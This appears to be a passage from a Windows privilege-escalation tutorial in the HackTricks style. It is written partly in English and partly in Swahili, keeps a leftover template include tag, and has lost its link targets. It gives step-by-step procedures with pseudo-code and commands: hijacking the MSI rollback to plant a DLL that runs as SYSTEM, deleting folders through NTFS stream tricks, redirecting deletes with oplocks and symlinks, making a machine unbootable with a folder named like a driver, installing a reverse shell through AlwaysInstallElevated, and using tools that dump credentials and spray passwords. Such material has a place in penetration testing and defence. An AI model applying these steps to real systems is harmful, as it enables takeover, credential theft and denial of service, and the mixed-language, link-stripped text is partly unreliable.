The attack basically consist of abusing the Windows Installer's rollback feature to replace legitimate files with malicious ones during the uninstallation process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by he Windows Installer to store rollback files during the uninstallation of other MSI packages where the rollback files would have been modified to contain the malicious payload.

The summarized technique is the following:

  1. Stage 1 Preparing for the Hijack (leave C:\Config.Msi empty)

  • Step 1: Install the MSI

  • Create an .msi that installs a harmless file (e.g., dummy.txt) in a writable folder (TARGETDIR).

  • Mark the installer as "UAC Compliant", so a non-admin user can run it.

  • Keep a handle open to the file after install.

  • Step 2: Begin Uninstall

  • Uninstall the same .msi.

  • The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).

  • Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.

  • Step 3: Custom Syncing

  • The .msi includes a custom uninstall action (SyncOnRbfWritten) that:

  • Signals when .rbf has been written.

  • Then waits on another event before continuing the uninstall.

  • Step 4: Block Deletion of .rbf

  • When signaled, open the .rbf file without FILE_SHARE_DELETE — this prevents it from being deleted.

  • Then signal back so the uninstall can finish.

  • Windows Installer fails to delete the .rbf, and because it cant delete all contents, C:\Config.Msi is not removed.

  • Step 5: Manually Delete .rbf

  • You (attacker) delete the .rbf file manually.

  • Now C:\Config.Msi is empty, ready to be hijacked.

At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.

  1. Stage 2 Replacing Rollback Scripts with Malicious Ones

  • Step 6: Recreate C:\Config.Msi with Weak ACLs

  • Recreate the C:\Config.Msi folder yourself.

  • Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.

  • Step 7: Run Another Install

  • Install the .msi again, with:

  • TARGETDIR: Writable location.

  • ERROROUT: A variable that triggers a forced failure.

  • This install will be used to trigger rollback again, which reads .rbs and .rbf.

  • Step 8: Monitor for .rbs

  • Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.

  • Capture its filename.

  • Step 9: Sync Before Rollback

  • The .msi contains a custom install action (SyncBeforeRollback) that:

  • Signals an event when the .rbs is created.

  • Then waits before continuing.

  • Step 10: Reapply Weak ACL

  • After receiving the .rbs created event:

  • The Windows Installer reapplies strong ACLs to C:\Config.Msi.

  • But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.

ACLs are only enforced on handle open, so you can still write to the folder.

  • Step 11: Drop Fake .rbs and .rbf

  • Overwrite the .rbs file with a fake rollback script that tells Windows to:

  • Restore your .rbf file (malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).

  • Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.

  • Step 12: Trigger the Rollback

  • Signal the sync event so the installer resumes.

  • A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.

  • This causes rollback to begin.

  • Step 13: SYSTEM Installs Your DLL

  • Windows Installer:

  • Reads your malicious .rbs.

  • Copies your .rbf DLL into the target location.

  • You now have your malicious DLL in a SYSTEM-loaded path.

  • Final Step: Execute SYSTEM Code

  • Run a trusted auto-elevated binary (e.g., osk.exe) that loads the DLL you hijacked.

  • Boom: Your code is executed as SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion ?

You could exploit NTFS internals: every folder has a hidden alternate data stream called:

C:\SomeFolder::$INDEX_ALLOCATION

Mtiririko huu huhifadhi metadata ya faharasa ya kabrasha.

Kwa hivyo, ukifuta mto ::$INDEX_ALLOCATION wa kabrasha, NTFS huondoa kabrasha lote kutoka kwenye mfumo wa faili.

Unaweza kufanya hivyo kwa kutumia APIs za kawaida za kufuta faili kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Ingawa unaita file delete API, inafuta folder yenyewe.

Kutoka Folder Contents Delete hadi SYSTEM EoP

Je, vipi ikiwa primitive yako hairuhusu kufuta faili/folda yoyote, lakini inaruhusu kufuta yaliyomo ya folder inayodhibitiwa na mshambuliaji?

  1. Hatua 1: Tengeneza folder ya mtego na file
  • Unda: C:\temp\folder1
  • Ndani yake: C:\temp\folder1\file1.txt
  1. Hatua 2: Weka oplock kwenye file1.txt
  • Oplock hiyo inasitisha utekelezaji wakati mchakato mwenye ruhusa anapojaribu kufuta file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
  1. Hatua 3: Chochea mchakato wa SYSTEM (mfano, SilentCleanup)
  • Mchakato huu unapitia folda (mfano, %TEMP%) na kujaribu kufuta yaliyomo ndani yao.
  • Itakapoifika file1.txt, oplock triggers na inakabidhi udhibiti kwa callback yako.
  1. Hatua 4: Ndani ya oplock callback elekeza kufutwa

  • Chaguo A: Hamisha file1.txt mahali pengine

  • Hii inafanya folder1 kuwa tupu bila kuvunja oplock.

  • Usifute file1.txt moja kwa moja — hiyo itatoa oplock mapema.

  • Chaguo B: Badilisha folder1 kuwa junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  • Chaguo C: Unda symlink katika \RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya kabrasha — kuifuta kwake kunaondoa kabrasha.

  1. Hatua 5: Kuachilia oplock
  • Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
  • Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:
C:\Config.Msi::$INDEX_ALLOCATION

Matokeo: C:\Config.Msi imefutwa na SYSTEM.

From Arbitrary Folder Create to Permanent DoS

Tumia primitive inayokuruhusu create an arbitrary folder as SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.

Unda folda (si faili) yenye jina la dereva muhimu wa Windows, kwa mfano:

C:\Windows\System32\cng.sys
  • Njia hii kwa kawaida inalingana na cng.sys kernel-mode driver.
  • Ikiwa utaiunda mapema kama folda, Windows inashindwa kupakia driver halisi wakati wa boot.
  • Kisha, Windows inajaribu kupakia cng.sys wakati wa boot.
  • Inaiwona folda, inashindwa kutatua driver halisi, na inasababisha crash au kusimamisha boot.
  • Hakuna fallback, na hakuna recovery bila uingiliaji wa nje (mfano, boot repair au disk access).

Kutoka High Integrity hadi System

New service

Ikiwa tayari unaendesha mchakato wa High Integrity, path to SYSTEM inaweza kuwa rahisi tu kwa creating and executing a new service:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Wakati unaunda binary ya service hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa ndani ya 20s ikiwa si service halali.

AlwaysInstallElevated

Kutoka kwenye mchakato wa High Integrity unaweza kujaribu kuwezesha AlwaysInstallElevated registry entries na kusakinisha reverse shell kutumia wrapper ya .msi.
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

Unaweza find the code here.

From SeDebug + SeImpersonate to Full Token privileges

Ikiwa una token privileges hizo (pengine utakutana nazo kwenye mchakato ulio tayari kuwa High Integrity), utaweza open almost any process (si protected processes) kwa kutumia SeDebug privilege, copy the token ya mchakato, na kuunda arbitrary process with that token.
Kwa kutumia teknik hii kawaida huwachagua mchakato wowote unaoendesha kama SYSTEM mwenye token privileges zote (ndio, unaweza kupata SYSTEM processes bila token privileges zote).
Unaweza kupata example of code executing the proposed technique here.

Named Pipes

This technique is used by meterpreter to escalate in getsystem. The technique consists on creating a pipe and then create/abuse a service to write on that pipe. Then, the server that created the pipe using the SeImpersonate privilege will be able to impersonate the token of the pipe client (the service) obtaining SYSTEM privileges.
Ikiwa unataka learn more about name pipes you should read this.
Ikiwa unataka kusoma mfano wa how to go from high integrity to System using name pipes you should read this.

Dll Hijacking

Ikiwa utaweza hijack a dll inayokuwa loaded na process inayokimbia kama SYSTEM utaweza kutekeleza arbitrary code kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi, ni more easy to achieve from a high integrity process kwani itakuwa na write permissions kwenye folders zinazotumiwa kupakia dlls.
You can learn more about Dll hijacking here.

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Soma: https://github.com/itm4n/FullPowers

Msaada zaidi

Static impacket binaries

Zana muhimu

Zana bora ya kutafuta Windows local privilege escalation vectors: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) -- Inakagua misconfigurations na faili nyeti (check here). Imegunduliwa.
JAWS -- Inakagua baadhi ya misconfigurations zinazowezekana na kukusanya taarifa (check here).
privesc -- Inakagua misconfigurations
SessionGopher -- Hutoa taarifa za session zilizohifadhiwa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa local.
Invoke-WCMDump -- Huchota credentials kutoka Credential Manager. Imegunduliwa.
DomainPasswordSpray -- Inaspray passwords zilizokusanywa kwenye domain
Inveigh -- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na zana ya man-in-the-middle.
WindowsEnum -- Uorodhesha wa msingi wa Windows kwa privesc
Sherlock ~~~~ -- Inatafuta privesc vulnerabilities zinazojulikana (DEPRECATED for Watson)
WINspect -- Kukagua kwa local (Need Admin rights)

Exe

Watson -- Inatafuta privesc vulnerabilities zinazojulikana (inahitaji kujengwa kwa kutumia VisualStudio) (precompiled)
SeatBelt -- Inaorodhesha host ikitafuta misconfigurations (ni zaidi zana ya kukusanya taarifa kuliko privesc) (inahitaji kujengwa) (precompiled)
LaZagne -- Huchota credentials kutoka kwa programu nyingi (precompiled exe in github)
SharpUP -- Port ya PowerUp kwenda C#
Beroot ~~~~ -- Kagua misconfiguration (executable precompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.
Windows-Privesc-Check -- Kagua misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.

Bat

winPEASbat -- Zana iliyotengenezwa kwa kuzingatia chapisho hili (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester -- Inasoma matokeo ya systeminfo na inapendekeza exploits zinazoendelea kufanya kazi (python za local)
Windows Exploit Suggester Next Generation -- Inasoma matokeo ya systeminfo na inapendekeza exploits zinazoendelea kufanya kazi (python za local)

Meterpreter

multi/recon/local_exploit_suggestor

Unalazimika kukusanya mradi kwa kutumia toleo sahihi la .NET (see this). Ili kuona toleo la .NET lililowekwa kwenye host ya mwathiri unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Marejeo

{{#include ../../banners/hacktricks-training.md}}